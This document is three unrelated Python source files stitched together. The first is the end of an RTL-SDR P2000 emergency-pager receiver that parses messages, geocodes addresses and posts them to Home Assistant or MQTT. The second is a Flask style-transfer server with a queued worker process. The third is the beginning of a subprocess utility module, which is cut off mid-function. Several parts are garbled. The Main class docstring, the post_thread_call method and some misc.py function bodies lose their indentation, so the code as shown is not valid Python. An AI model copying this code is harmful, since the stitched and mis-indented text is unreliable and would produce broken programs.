# fails with AttributeError -- confirm the intended first-run behavior.
logger = Logger(datadir, 7, config.getboolean("main", "debug"))
class Main:
"""Main class, start of application."""
    def __init__(self):
        """Start the receiver: load config and filter files, spawn the
        RTL-SDR reader and Home Assistant poster threads, then block in the
        main wait loop until KeyboardInterrupt."""
        self.running = True
        self.messages = []
        # Init logging (logger/config are module-level, created at import)
        self.logger = logger
        self.config = config
        if self.config:
            self.logger.info(f"Loading configuration from '{CFGFILE}'")
        else:
            self.logger.info(
                f"Created config file '{CFGFILE}', edit it and restart the program."
            )
        # NOTE(review): when config is False (a default file was just
        # written) the getboolean() calls below fail -- confirm intent.
        self.debug = self.config.getboolean("main", "debug")
        self.logtofile = self.config.getboolean("main", "logtofile")
        # Set current folder so we can find the config files
        os.chdir(os.path.dirname(os.path.abspath(__file__)))
        # If log2file is enabled, check if logfiles folder exists
        if self.logtofile:
            if (not os.path.exists('logfiles')):
                os.mkdir('logfiles')
        self.logger.info(f"RTL-SDR P2000 Receiver for Home Assistant Version {VERSION}")
        self.logger.info("Started at %s" % time.strftime("%A %H:%M:%S %d-%m-%Y"))
        # Check if required software is installed
        if not check_requirements(self):
            self.logger.error("Application stopped, required software was not found!")
            sys.exit(0)
        # RTL-SDR / Home Assistant / MQTT / OpenCage settings from config
        self.rtlfm_cmd = self.config.get("rtl-sdr", "cmd")
        self.use_hass = self.config.getboolean("home-assistant", "enabled")
        self.baseurl = self.config.get("home-assistant", "baseurl")
        self.token = self.config.get("home-assistant", "token")
        self.use_mqtt = self.config.getboolean("mqtt", "enabled")
        self.mqtt_server = self.config.get("mqtt", "mqtt_server")
        self.mqtt_port = int(self.config.get("mqtt", "mqtt_port"))
        self.mqtt_username = self.config.get("mqtt", "mqtt_user")
        self.mqtt_password = self.config.get("mqtt", "mqtt_password")
        self.mqtt_topic = self.config.get("mqtt", "mqtt_topic")
        self.use_opencage = self.config.getboolean("opencage", "enabled")
        self.opencagetoken = self.config.get("opencage", "token")
        self.opencage_disabled = False
        # Load capcodes data
        self.capcodes = load_capcodes_dict(self, "db_capcodes.txt")
        # Load plaatsnamen data
        self.plaatsnamen = load_list(self, "db_plaatsnamen.txt")
        # Load plaatsnamen afkortingen data
        self.pltsnmn = load_capcodes_dict(self, "db_pltsnmn.txt")
        # Load capcodes ignore data
        self.ignorecapcodes = load_capcodes_filter_dict(self, "ignore_capcodes.txt")
        # Load text ignore data
        self.ignoretext = load_list(self, "ignore_text.txt")
        # Load match text filter data
        # self.matchtext = load_list(self, "match_text.txt.example")
        self.matchtext = load_list(self, "match_text.txt")
        # Load match capcodes filter data
        self.matchcapcodes = load_capcodes_filter_dict(self, "match_capcodes.txt")
        # Start thread to get data from RTL-SDR stick
        data_thread = threading.Thread(name="DataThread", target=self.data_thread_call)
        data_thread.start()
        # Start thread to post messages to Home Assistant
        post_thread = threading.Thread(name="PostThread", target=self.post_thread_call)
        post_thread.start()
        # Run the wait loop; Ctrl-C breaks out and signals the workers to stop
        while True:
            try:
                time.sleep(1)
            except KeyboardInterrupt:
                break
        # Application is interrupted and is stopping
        self.running = False
        self.logger.info("Application stopped")
    def post_data(self, msg):
        """Evaluate *msg* against every configured sensor_* section and post
        matching messages to Home Assistant (REST) and/or MQTT."""
        # Loop through all sensors
        for section in config.sections():
            # Each section is a sensor; reset per-sensor state first
            self.radius = ""
            self.sensorname = ""
            self.home_coordinates = ""
            self.friendly_name = ""
            self.searchkeyword = ""
            self.searchcapcode = ""
            self.searchregion = ""
            post = False
            if section.startswith("sensor_"):
                self.sensorname = section.replace("sensor_", "")
                if "zone_radius" in self.config.options(section):
                    self.home_coordinates = (
                        float(self.config.get(section, "zone_latitude")),
                        float(self.config.get(section, "zone_longitude"))
                    )
                    self.radius = self.config.get(section, "zone_radius", fallback="")
                msg.friendly_name = self.config.get(section, "friendlyname", fallback="P2000-SDR")
                # Comma-separated filter options (an absent option yields [''])
                self.searchkeyword = self.config.get(section, "searchkeyword", fallback="").split(",")
                self.searchcapcode = self.config.get(section, "searchcapcode", fallback="").split(",")
                self.searchregion = self.config.get(section, "searchregion", fallback="").split(",")
                self.searchdiscipline = self.config.get(section, "searchdiscipline", fallback="").split(",")
                # If location is known and radius is specified in config calculate distance and check radius
                if msg.latitude and msg.longitude and self.radius:
                    event_coordinates = (msg.latitude, msg.longitude)
                    msg.distance = round(
                        geopy.distance.geodesic(
                            self.home_coordinates, event_coordinates
                        ).km,
                        2,
                    )
                    self.logger.debug(
                        f"Distance from home {msg.distance} km, radius set to {self.radius} km"
                    )
                    if msg.distance > float(self.radius):
                        self.logger.debug(
                            f"Message '{msg.body}' ignored for sensor {self.sensorname} (distance outside radius)"
                        )
                        msg.is_posted = True
                        continue
                    post = True
                # Check for matched text/keyword
                if "searchkeyword" in self.config.options(section):
                    if not check_filter(self.searchkeyword, msg.body):
                        self.logger.debug(
                            f"Message '{msg.body}' ignored for sensor {self.sensorname} (didn't match keyword) - {self.searchkeyword}"
                        )
                        msg.is_posted = True
                        continue
                    self.logger.debug(
                        f"Message '{msg.body}' posted for sensor {self.sensorname} (sensor succesfull match keyword) - {self.searchkeyword}"
                    )
                    post = True
                # Check for matched regions
                if "searchregion" in self.config.options(section):
                    if not check_filter(self.searchregion, msg.region):
                        self.logger.debug(
                            f"Message '{msg.body}' ignored for sensor {self.sensorname} (didn't match region) - {self.searchregion}"
                        )
                        msg.is_posted = True
                        continue
                    self.logger.debug(
                        f"Message '{msg.body}' posted for sensor {self.sensorname} (sensor succesfull match region) - {self.searchregion}"
                    )
                    post = True
                # Check for matched capcodes
                if "searchcapcode" in self.config.options(section):
                    if not check_filter_with_list(self.searchcapcode, msg.capcodes):
                        self.logger.debug(
                            f"Message '{msg.body}'{msg.capcodes} ignored for sensor {self.sensorname} (didn't match capcode) - {self.searchcapcode}"
                        )
                        msg.is_posted = True
                        continue
                    self.logger.debug(
                        f"Message '{msg.body}'{msg.capcodes} posted for sensor {self.sensorname} (sensor succesfull match capcode) - {self.searchcapcode}"
                    )
                    post = True
                # Check for matched disciplines
                if "searchdiscipline" in self.config.options(section):
                    if not check_filter(self.searchdiscipline, msg.disciplines):
                        self.logger.debug(
                            f"Message '{msg.body}'{msg.disciplines} ignored for sensor {self.sensorname} (didn't match discipline) - {self.searchdiscipline}"
                        )
                        msg.is_posted = True
                        continue
                    self.logger.debug(
                        f"Message '{msg.body}'{msg.disciplines} posted for sensor {self.sensorname} (sensor succesfull match discipline) - {self.searchdiscipline}"
                    )
                    post = True
                # No other matches valid, if distance is not valid, skip
                if post is False:
                    self.logger.debug(
                        f"Message '{msg.body}' ignored for sensor {self.sensorname} (no post criteria)"
                    )
                    msg.is_posted = True
                    continue
                # If logging all messages to file is requested, log message
                if self.logtofile:
                    logmessage = "Posted" + ' -|- ' + msg.message_raw + ' -|- ' + self.sensorname + ' -|- ' + msg.region + ' -|- ' + msg.mapurl
                    log2file(logmessage)
                """Post data to Home Assistant via Rest API and/or MQTT topic."""
                # Sensor state is the message body; everything else goes into
                # the attribute dictionary.
                data = {
                    "state": msg.body,
                    "attributes": {
                        "time received": msg.timestamp,
                        "group id": msg.groupid,
                        "receivers": msg.receivers,
                        "capcodes": msg.capcodes,
                        "priority": msg.priority,
                        "disciplines": msg.disciplines,
                        "raw message": msg.message_raw,
                        "region": msg.region,
                        "location": msg.location,
                        "postal code": msg.postalcode,
                        "city": msg.city,
                        "address": msg.address,
                        "street": msg.street,
                        "remarks": msg.remarks,
                        "longitude": msg.longitude,
                        "latitude": msg.latitude,
                        "opencage": msg.opencage,
                        "mapurl": msg.mapurl,
                        "distance": msg.distance,
                        "friendly_name": msg.friendly_name,
                    },
                }
                # NOTE(review): heartbeat is built but never used in this
                # method -- confirm whether it is dead code.
                heartbeat = {
                    "state": time.strftime("%Y%m%d"),
                }
                if self.use_hass:
                    try:
                        self.logger.debug(f"Posting to Home Assistant - {self.sensorname}")
                        headers = {
                            "Authorization": "Bearer " + self.token,
                            "content-type": "application/json",
                        }
                        response = requests.post(
                            self.baseurl + "/api/states/sensor." + self.sensorname,
                            headers=headers,
                            data=json.dumps(
                                data, default=lambda o: o.__dict__, sort_keys=True, indent=4
                            ),
                        )
                        response.raise_for_status()
                        self.logger.debug(f"POST data: {data}")
                        self.logger.debug(
                            f"POST status: {response.status_code} {response.reason}"
                        )
                        self.logger.debug(f"POST text: {response.text}")
                        self.logger.debug(f"OpenCage status: {msg.opencage}")
                    except requests.HTTPError:
                        self.logger.error(
                            f"HTTP Error while trying to post data, check baseurl and token in config.ini: {response.status_code} {response.reason}"
                        )
                    except requests.exceptions.SSLError as err:
                        self.logger.error(
                            f"SSL Error occurred while trying to post data, check baseurl in config.ini:\n{err}"
                        )
                    except requests.exceptions.ConnectionError as err:
                        self.logger.error(
                            f"Connection Error occurred while trying to post data, check baseurl in config.ini:\n{err}"
                        )
                    finally:
                        # Mark as posted to prevent race conditions
                        msg.is_posted = True
                if self.use_mqtt:
                    try:
                        self.logger.debug("Posting to MQTT")
                        data = json.dumps(data)
                        client = mqtt.Client()
                        client.username_pw_set(self.mqtt_username, self.mqtt_password)
                        client.connect(self.mqtt_server, self.mqtt_port, 60)
                        client.publish(self.mqtt_topic, data)
                        client.disconnect()
                        self.logger.debug(
                            f"MQTT status: Posting to {self.mqtt_server}:{self.mqtt_port} topic:{self.mqtt_topic}"
                        )
                        self.logger.debug(f"MQTT json: {data}")
                    finally:
                        # Mark as posted to prevent race conditions
                        msg.is_posted = True
    def data_thread_call(self):
        """Thread for parsing data from RTL-SDR.

        Reads FLEX pager lines from the multimon-ng subprocess, filters them
        against the configured capcode/ignore lists, extracts street, postal
        code and city via a cascade of regexes, optionally geocodes the
        address through OpenCage, and prepends the resulting MessageItem to
        ``self.messages`` (capped at 100 entries).
        """
        self.logger.info(f"RTL-SDR process started with: {self.rtlfm_cmd}")
        multimon_ng = subprocess.Popen(
            self.rtlfm_cmd, stdout=subprocess.PIPE, shell=True
        )
        try:
            while self.running:
                # Read line from process
                line = multimon_ng.stdout.readline()
                try:
                    line = line.decode("utf8", "backslashreplace")
                except UnicodeDecodeError:
                    self.logger.debug(f"Error while decoding utf8 string: {line}")
                    line = ""
                multimon_ng.poll()
                if line.startswith("FLEX") and line.__contains__("ALN"):
                    line_data = line.split("|")
                    timestamp = line_data[1]
                    groupid = line_data[3].strip()
                    capcodes = line_data[4].strip()
                    message = line_data[6].strip()
                    priority = p2000_get_prio(message)
                    location = ""
                    postalcode = ""
                    city = ""
                    address = ""
                    street = ""
                    longitude = ""
                    latitude = ""
                    opencage = ""
                    distance = ""
                    mapurl = ""
                    gpscheck = False
                    self.logger.debug(line.strip())
                    # Check capcodes first, only if they are defined in config
                    # NOTE(review): the ``continue`` statements below advance
                    # the inner capcode loop only; the message itself is still
                    # processed afterwards — confirm this is intended.
                    if self.matchcapcodes or self.ignorecapcodes:
                        for capcode in capcodes.split(" "):
                            if self.matchcapcodes:
                                # Apply filter
                                if capcode in self.matchcapcodes:
                                    self.logger.debug(
                                        f"Capcode '{capcode}' found in '{self.matchcapcodes}' (capcode in match_capcodes)"
                                    )
                                else:
                                    self.logger.debug(
                                        f"Message '{message}' ignored because capcode '{capcode}' not found in '{self.matchcapcodes}'"
                                    )
                                    continue
                            if self.ignorecapcodes and len(capcodes.split(" ")) == 1:
                                if capcode in self.ignorecapcodes:
                                    self.logger.debug(
                                        f"Message '{message}' ignored because it contains only one capcode '{capcode}' which is found in '{self.ignorecapcodes}' (capcode in ignore_capcodes)"
                                    )
                                    continue
                    # Check for ignore texts
                    if check_filter(self.ignoretext, message):
                        self.logger.debug(
                            f"Message '{message}' ignored (matched ignore_text)"
                        )
                        if self.logtofile:
                            logmessage = "Ignore text" + ' -|- ' + line.strip()
                            log2file(logmessage)
                        continue
                    # Get address info if any, look for valid postalcode and get the two words around them
                    # A2 (DIA: ja) AMBU 17106 Schiedamseweg 3134BA Vlaardingen VLAARD bon 8576
                    regex_address = r"(\w*.) ([1-9][0-9]{3}[a-zA-Z]{2}) (.\w*)"
                    addr = re.search(regex_address, message)
                    if addr:
                        street = addr.group(1)
                        postalcode = addr.group(2)
                        city = addr.group(3)
                        address = f"{street} {postalcode} {city}"
                        # Remove Capitalized city name from message (when postalcode is found)
                        regex_afkortingen = "[A-Z]{2,}"
                        afkortingen = re.findall(regex_afkortingen, message)
                        for afkorting in afkortingen:
                            if afkorting in self.pltsnmn:
                                message = re.sub(afkorting, "", message)
                    # Get address in info if any, look for valid postalcode without letters and get the two words around them
                    # A1 13108 Surinameplein 1058 Amsterdam 12006
                    regex_address2 = r"(\w*.) ([1-9][0-9]{3}) (.\w*)"
                    addr2 = re.search(regex_address2, message)
                    if addr2:
                        # print("Regex Amsterdam")
                        street = addr2.group(1)
                        postalcode = addr2.group(2)
                        city = addr2.group(3)
                        address = f"{street} {city}"
                        # Remove Capitalized city name from message (when postalcode is found)
                        regex_afkortingen = "[A-Z]{2,}"
                        afkortingen = re.findall(regex_afkortingen, message)
                        for afkorting in afkortingen:
                            if afkorting in self.pltsnmn:
                                message = re.sub(afkorting, "", message)
                    # Try to get city only when there is one after a prio
                    # A1 Breda
                    else:
                        regex_prio_loc = r"(^A\s?1|\s?A\s?2|B\s?1|^B\s?2|^B\s?3|PRIO\s?1|^P\s?1|PRIO\s?2|^P\s?2) (.\w*)"
                        loc = re.search(regex_prio_loc, message)
                        if loc and loc.group(2) in self.plaatsnamen:
                            city = loc.group(2)
                        else:
                            # Find all uppercase words and check if there is a valid city name amoung them
                            # A2 Ambulancepost Moordrecht Middelweg MOORDR V
                            regex_afkortingen = "[A-Z]{2,}"
                            afkortingen = re.findall(regex_afkortingen, message)
                            for afkorting in afkortingen:
                                if afkorting in self.pltsnmn:
                                    city = self.pltsnmn[afkorting]["plaatsnaam"]
                                    # If uppercase city is found, grab first word before that city name, since it's likely to be the streetname
                                    regex_address = rf"(\w*.) ({afkorting})"
                                    addr = re.search(regex_address, message)
                                    if addr:
                                        street = addr.group(1)
                                        address = f"{street} {city}"
                                    # Change uppercase city to normal city in message
                                    message = re.sub(afkorting, city, message)
                    # If no address is found, do a wild guess
                    if not address:
                        # Strip all status info from messag
                        regex_messagestrip = r"(^A\s?1|\s?A\s?2|B\s?1|^B\s?2|^B\s?3|PRIO\s?1|^P\s?1|PRIO\s?2|^P\s?2|^PRIO\s?3|^P\s?3|^PRIO\s?4|^P\s?4)(\W\d{2,}|.*(BR)\b|)|(rit:|rit|bon|bon:|ambu|dia|DIA)\W\d{5,8}|\b\d{5,}$|( : )|\(([^\)]+)\)( \b\d{5,}|)|directe (\w*)|(-)+/gi"
                        strip = re.sub(regex_messagestrip, "", message, flags=re.I)
                        # Strip any double spaces from message
                        regex_doublespaces = r"(^[ \t]+|[ \t]+$)"
                        strip = re.sub(regex_doublespaces, "", strip)
                        # Strip all double words from message
                        regex_doublewords = r"(\b\S+\b)(?=.*\1)"
                        strip = re.sub(regex_doublewords, "", strip)
                        # print("Strip: " + strip)
                        # Search in leftover message for a city corresponding to City list
                        for plaatsnaam in self.plaatsnamen:
                            if plaatsnaam in strip:
                                self.logger.debug("City found: " + plaatsnaam)
                                # Find first word left from city
                                regex_plaatsnamen_strip = (
                                    rf"\w*.[a-z|A-Z] \b{plaatsnaam}\b"
                                )
                                plaatsnamen_strip = re.search(
                                    regex_plaatsnamen_strip, strip
                                )
                                if plaatsnamen_strip:
                                    addr = plaatsnamen_strip.group(0)
                                    # Final non address symbols strip
                                    regex_plaatsnamen_strip_strip = (
                                        r"(- )|(\w[0-9] )"
                                    )
                                    addr = re.sub(
                                        regex_plaatsnamen_strip_strip, "", addr
                                    )
                                    address = addr
                                    city = plaatsnaam
                                    self.logger.debug(
                                        "Adress found: "
                                        + plaatsnamen_strip.group(0)
                                    )
                    # Get more info about the capcodes
                    for capcode in capcodes.split(" "):
                        if capcode in self.capcodes:
                            receiver = "{} ({})".format(
                                self.capcodes[capcode]["description"],
                                capcode
                            )
                            discipline = "{}".format(
                                self.capcodes[capcode]["discipline"]
                            )
                            region = self.capcodes[capcode]["region"]
                            location = self.capcodes[capcode]["location"]
                            remark = self.capcodes[capcode]["remark"]
                        else:
                            receiver = capcode
                            discipline = ""
                            region = ""
                            remark = ""
                        # If this message was already received, only add extra info
                        if len(self.messages) > 0 and self.messages[0].body == message:
                            if self.messages[0].receivers == "":
                                self.messages[0].receivers = receiver
                            elif receiver:
                                self.messages[0].receivers += ", " + receiver
                            if self.messages[0].disciplines == "":
                                self.messages[0].disciplines = discipline
                            elif discipline:
                                self.messages[0].disciplines += ", " + discipline
                            if self.messages[0].remarks == "":
                                self.messages[0].remarks = remark
                            elif remark:
                                self.messages[0].remarks += ", " + remark
                            if self.messages[0].region == "":
                                self.messages[0].region = region
                            self.messages[0].capcodes.append(capcode)
                            self.messages[0].location = location
                            self.messages[0].postalcode = postalcode
                            self.messages[0].city = city
                            self.messages[0].street = street
                            self.messages[0].address = address
                        else:
                            # After midnight (UTC), reset the opencage disable
                            # NOTE(review): this presumably relies on
                            # ``from datetime import datetime`` at file top —
                            # with ``import datetime`` this line would raise.
                            hour = datetime.utcnow()
                            if (
                                hour.hour >= 0
                                and hour.minute >= 1
                                and hour.hour < 1
                                and hour.minute < 15
                            ):
                                self.opencage_disabled = False
                            # If address is filled and OpenCage is enabled check for GPS coordinates
                            if (
                                address
                                and self.use_opencage
                                and (self.opencage_disabled is False)
                                and not gpscheck is True  # parses as not (gpscheck is True)
                            ):
                                geocoder = OpenCageGeocode(self.opencagetoken)
                                try:
                                    gps = geocoder.geocode(address, countrycode="nl")
                                    gpscheck = True
                                    if gps:
                                        latitude = gps[0]["geometry"]["lat"]
                                        longitude = gps[0]["geometry"]["lng"]
                                        mapurl = gps[0]["annotations"]["OSM"]["url"]
                                        self.logger.debug(
                                            f"OpenCage results: {latitude}, {longitude}, {mapurl}"
                                        )
                                    else:
                                        latitude = ""
                                        longitude = ""
                                        mapurl = ""
                                # Rate-error check from opencage
                                except RateLimitExceededError as rle:
                                    self.logger.error(rle)
                                    # Over rate, opencage check disabled
                                    if rle:
                                        self.opencage_disabled = True
                                except InvalidInputError as ex:
                                    self.logger.error(ex)
                            else:
                                gpscheck = False
                            opencage = f"enabled: {self.use_opencage} ratelimit: {self.opencage_disabled} gps-checked: {gpscheck}"
                            msg = MessageItem()
                            msg.groupid = groupid
                            msg.receivers = receiver
                            msg.capcodes = capcodes.split(" ")
                            msg.body = message
                            msg.message_raw = line.strip()
                            msg.disciplines = discipline
                            msg.priority = priority
                            msg.region = region
                            msg.location = location
                            msg.postalcode = postalcode
                            msg.longitude = longitude
                            msg.latitude = latitude
                            msg.city = city
                            msg.street = street
                            msg.address = address
                            msg.remarks = remark
                            msg.opencage = opencage
                            msg.mapurl = mapurl
                            msg.timestamp = to_local_datetime(timestamp)
                            msg.is_posted = False
                            msg.distance = distance
                            self.messages.insert(0, msg)
                            # Limit the message list size
                            if len(self.messages) > 100:
                                self.messages = self.messages[:100]
        except KeyboardInterrupt:
            os.kill(multimon_ng.pid, 9)
        self.logger.debug("Data thread stopped")
# Thread for posting data to Home Assistant
def post_thread_call(self):
"""Thread for posting data."""
self.logger.debug("Post thread started")
while True:
if self.running is False:
break
now = time.monotonic()
for msg in self.messages:
if msg.is_posted is False and now - msg.timereceived >= 1.0:
self.post_data(msg)
time.sleep(1.0)
self.logger.debug("Post thread stopped")
# Start application
# Module entry point: constructing Main launches the receiver/post threads.
Main()
|
server.py | #
# server.py
# Style Transfer Server
#
import os
import api
import uuid
import styleopt
from PIL import Image
from flask import Flask, request
from multiprocessing import Process, Queue, Manager
## Tasking
# Style transfer worker that runs style transfers task as defined by the
# payloads queued
class TransferWorker:
    """Background worker that runs queued style-transfer tasks.

    Tasks are consumed by a dedicated worker process; per-task progress
    (0.0-1.0, or -1.0 on failure) is shared back through a Manager dict.
    """
    def __init__(self, queue=None, verbose=True):
        """Create the worker and start its background process.

        queue -- optional multiprocessing Queue of tasks; a fresh queue is
            created when omitted. (The original signature used
            ``queue=Queue()``, a mutable default evaluated once at
            class-definition time and therefore shared by every instance.)
        verbose -- when True, print task progress to stdout.
        """
        self.queue = Queue() if queue is None else queue
        self.verbose = verbose
        # Setup shared style transfer process log: task id -> progress fraction
        manager = Manager()
        self.log = manager.dict()
        # Setup directory for generated pastiches before the worker needs it
        if not os.path.exists("static/pastiche"):
            os.mkdir("static/pastiche")
        # Setup worker process
        self.process = Process(target=self.run)
        self.process.start()
    # Enqeue a new style transfer task parameterised by the given style
    # transfer request. Returns an uuid that uniquely identifies the task
    def enqueue(self, request):
        """Queue *request* for style transfer; return the new task id."""
        # Create task for request
        task_id = str(uuid.uuid4())
        task = {
            "request": request,
            "ID": task_id
        }
        # Record initial progress, then queue task for style transfer
        self.log[task_id] = 0.0
        self.queue.put(task)
        return task_id
    # Run loop of worker
    def run(self):
        """Worker-process loop: perform style transfers until terminated."""
        while True:
            # Perform style transfer for style transfer request
            task = self.queue.get()
            request = task["request"]
            task_id = task["ID"]
            # Unpack style transfer request
            content_image = request.content_image
            style_image = request.style_image
            settings = request.settings
            # Callback to record status of style transfer in worker log
            def callback_status(graph, feed, i_epoch):
                n_epoch = graph.settings["n_epochs"]
                self.log[task_id] = i_epoch / n_epoch
            if self.verbose: print("[TransferWorker]: processing task: ", task_id)
            try:
                pastiche_image = styleopt.transfer_style(content_image, style_image,
                                                         settings=settings,
                                                         callbacks=[styleopt.callback_progress,
                                                                    styleopt.callback_tensorboard,
                                                                    callback_status])
            except Exception as e:
                # Style transfer failed for some reason
                print("[TransferWorker]: FATAL: style transfer failed for task:",
                      task_id)
                print(repr(e))
                self.log[task_id] = -1.0  # Mark failure for task in log
                continue  # Abandon and work on next job
            # Save results of style transfer
            if self.verbose: print("[TransferWorker]: completed payload: ", task_id)
            pastiche_image.save("static/pastiche/{}.jpg".format(task_id))
    # Check the status of the worker task specified by task_id
    # Returns None if no task for the given task_id is found
    # Returns -1.0 if style transfer task failed for some reason
    def check_status(self, task_id):
        """Return the progress for *task_id*, or None when unknown."""
        if task_id not in self.log:
            return None
        return self.log[task_id]
# Single module-level worker shared by all request handlers below
worker = TransferWorker()
# Server Routes
# Flask application serving both the REST API and generated static files
app = Flask(__name__, static_folder="static")
# Default route "/" displays server running message, used to check server if
# server is running properly
@app.route("/", methods=["GET"])
def route_test():
    """Serve the static health-check page (static/test.html)."""
    return app.send_static_file("test.html")
## REST API
# Rest API route "/api/style" triggers style transfer given POST style transfer
# request payload
@app.route("/api/style", methods=["POST"])
def route_api_style():
    """Parse the POSTed transfer request, queue it, and return its task id."""
    print("[REST]: /api/style")
    # Queue the parsed request on the worker; it hands back the task id
    queued_id = worker.enqueue(api.TransferRequest.parse(request.data))
    # Reply with the task id so the client can poll /api/status
    return api.TransferResponse(queued_id).serialise(), 200, {'ContentType': 'application/json'}
# Rest API route "/api/status" retrieves the current status of style transfer
# for the given task_id.
@app.route("/api/status/<task_id>", methods=["GET"])
def route_api_status(task_id):
    """Report style-transfer progress for *task_id* as a JSON status response."""
    print("[REST]: /api/status")
    # Query work current status
    progress = worker.check_status(task_id)
    # Fixed: compare against None with ``is``, not ``==`` (identity test)
    if progress is None:
        status_code = 404  # Task for the given ID not found
    elif progress == -1.0:
        status_code = 500  # Internal server error in style transfer
    else:
        status_code = 200
    # Return status response to request
    response = api.StatusResponse(progress)
    return response.serialise(), status_code, {'ContentType': 'application/json'}
# Rest API route "/api/pastiche" retrieves the pastiche
# for the given task_id.
@app.route("/api/pastiche/<task_id>", methods=["GET"])
def route_api_pastiche(task_id):
    """Serve the generated pastiche image for *task_id*, or an error status."""
    print("[REST]: /api/pastiche")
    # Query work current status
    progress = worker.check_status(task_id)
    # Fixed: compare against None with ``is``, not ``==`` (identity test)
    if progress is None:
        return "", 404  # Task for the given ID not found
    elif progress == -1.0:
        return "", 500  # Internal server error in style transfer
    elif 0.0 <= progress < 1.0:
        return "", 202  # Style transfer generated pastiche not yet ready
    return app.send_static_file("pastiche/{}.jpg".format(task_id)), 200
# Allow cross-origin requests from any origin (CORS)
@app.after_request
def handle_cors(response):
    """Attach a permissive CORS header to every outgoing response."""
    response.headers['Access-Control-Allow-Origin'] = '*'
    return response
if __name__ == "__main__":
    # Run the development server on all interfaces at the API's configured port
    app.run(host='0.0.0.0', port=api.SERVER_PORT)
|
misc.py | # -*- coding: utf-8 -*-
"""Some miscellaneous utility functions."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
#
# License: BSD (3-clause)
from contextlib import contextmanager
import fnmatch
import gc
import inspect
from math import log
import os
from queue import Queue, Empty
from string import Formatter
import subprocess
import sys
from threading import Thread
import traceback
import numpy as np
from ..utils import _check_option, _validate_type
from ..fixes import _get_args
from ._logging import logger, verbose, warn
def _pl(x, non_pl=''):
"""Determine if plural should be used."""
len_x = x if isinstance(x, (int, np.generic)) else len(x)
return non_pl if len_x == 1 else 's'
def _explain_exception(start=-1, stop=None, prefix='> '):
"""Explain an exception."""
# start=-1 means "only the most recent caller"
etype, value, tb = sys.exc_info()
string = traceback.format_list(traceback.extract_tb(tb)[start:stop])
string = (''.join(string).split('\n') +
traceback.format_exception_only(etype, value))
string = ':\n' + prefix + ('\n' + prefix).join(string)
return string
def _sort_keys(x):
"""Sort and return keys of dict."""
keys = list(x.keys()) # note: not thread-safe
idx = np.argsort([str(k) for k in keys])
keys = [keys[ii] for ii in idx]
return keys
class _DefaultEventParser:
"""Parse none standard events."""
def __init__(self):
self.event_ids = dict()
def __call__(self, description, offset=1):
if description not in self.event_ids:
self.event_ids[description] = offset + len(self.event_ids)
return self.event_ids[description]
class _FormatDict(dict):
    """Mapping that leaves unknown placeholders intact so pformat() can
    perform partial substitution."""

    def __missing__(self, key):
        return "{" + key + "}"


def pformat(temp, **fmt):
    """Format a template string partially.

    Examples
    --------
    >>> pformat("{a}_{b}", a='x')
    'x_{b}'
    """
    return Formatter().vformat(temp, (), _FormatDict(fmt))
def _enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
@verbose
def run_subprocess(command, return_code=False, verbose=None, *args, **kwargs):
    """Run command using subprocess.Popen.

    Run command and wait for command to complete. If the return code was zero
    then return, otherwise raise CalledProcessError.

    By default, this will also add stdout= and stderr=subprocess.PIPE
    to the call to Popen to suppress printing to the terminal.

    Parameters
    ----------
    command : list of str | str
        Command to run as subprocess (see subprocess.Popen documentation).
    return_code : bool
        If True, return the return code instead of raising an error if it's
        non-zero.

        .. versionadded:: 0.20
    %(verbose)s
    *args, **kwargs : arguments
        Additional arguments to pass to subprocess.Popen.

    Returns
    -------
    stdout : str
        Stdout returned by the process.
    stderr : str
        Stderr returned by the process.
    code : int
        The return code, only returned if ``return_code == True``.
    """
    all_out = ''
    all_err = ''
    # non-blocking adapted from https://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python#4896288 # noqa: E501
    out_q = Queue()
    err_q = Queue()
    with running_subprocess(command, *args, **kwargs) as p:
        # Daemon reader threads push raw lines into queues so this loop never
        # blocks on a full/empty pipe
        out_t = Thread(target=_enqueue_output, args=(p.stdout, out_q))
        err_t = Thread(target=_enqueue_output, args=(p.stderr, err_q))
        out_t.daemon = True
        err_t.daemon = True
        out_t.start()
        err_t.start()
        while True:
            # Sample liveness *before* draining so lines written just before
            # exit are still collected on the final pass
            do_break = p.poll() is not None
            # read all current lines without blocking
            while True:
                try:
                    out = out_q.get(timeout=0.01)
                except Empty:
                    break
                else:
                    out = out.decode('utf-8')
                    logger.info(out)
                    all_out += out
            while True:
                try:
                    err = err_q.get(timeout=0.01)
                except Empty:
                    break
                else:
                    err = err.decode('utf-8')
                    logger.warning(err)
                    all_err += err
            if do_break:
                break
    p.stdout.close()
    p.stderr.close()
    output = (all_out, all_err)
    if return_code:
        output = output + (p.returncode,)
    elif p.returncode:
        print(output)
        # Older Pythons lacked the ``output`` parameter on CalledProcessError,
        # hence the signature inspection before raising
        err_fun = subprocess.CalledProcessError.__init__
        if 'output' in _get_args(err_fun):
            raise subprocess.CalledProcessError(p.returncode, command, output)
        else:
            raise subprocess.CalledProcessError(p.returncode, command)
    return output
@contextmanager
def running_subprocess(command, after="wait", verbose=None, *args, **kwargs):
    """Context manager to do something with a command running via Popen.

    Parameters
    ----------
    command : list of str | str
        Command to run as subprocess (see :class:`python:subprocess.Popen`).
    after : str
        Can be:

        - "wait" to use :meth:`~python:subprocess.Popen.wait`
        - "communicate" to use :meth:`~python.subprocess.Popen.communicate`
        - "terminate" to use :meth:`~python:subprocess.Popen.terminate`
        - "kill" to use :meth:`~python:subprocess.Popen.kill`
    %(verbose)s
    *args, **kwargs : arguments
        Additional arguments to pass to subprocess.Popen.

    Returns
    -------
    p : instance of Popen
        The process.
    """
    _validate_type(after, str, 'after')
    _check_option('after', after, ['wait', 'terminate', 'kill', 'communicate'])
    # Default both pipes to PIPE unless the caller overrode them explicitly
    for stdxxx, sys_stdxxx in (['stderr', sys.stderr], ['stdout', sys.stdout]):
        if stdxxx not in kwargs:
            kwargs[stdxxx] = subprocess.PIPE
    # Check the PATH environment variable. If run_subprocess() is to be called
    # frequently this should be refactored so as to only check the path once.
    env = kwargs.get('env', os.environ)
    if any(p.startswith('~') for p in env['PATH'].split(os.pathsep)):
        warn('Your PATH environment variable contains at least one path '
             'starting with a tilde ("~") character. Such paths are not '
             'interpreted correctly from within Python. It is recommended '
             'that you use "$HOME" instead of "~".')
    if isinstance(command, str):
        command_str = command
    else:
        command = [str(s) for s in command]
        command_str = ' '.join(s for s in command)
    logger.info("Running subprocess: %s" % command_str)
    try:
        p = subprocess.Popen(command, *args, **kwargs)
    except Exception:
        if isinstance(command, str):
            command_name = command.split()[0]
        else:
            command_name = command[0]
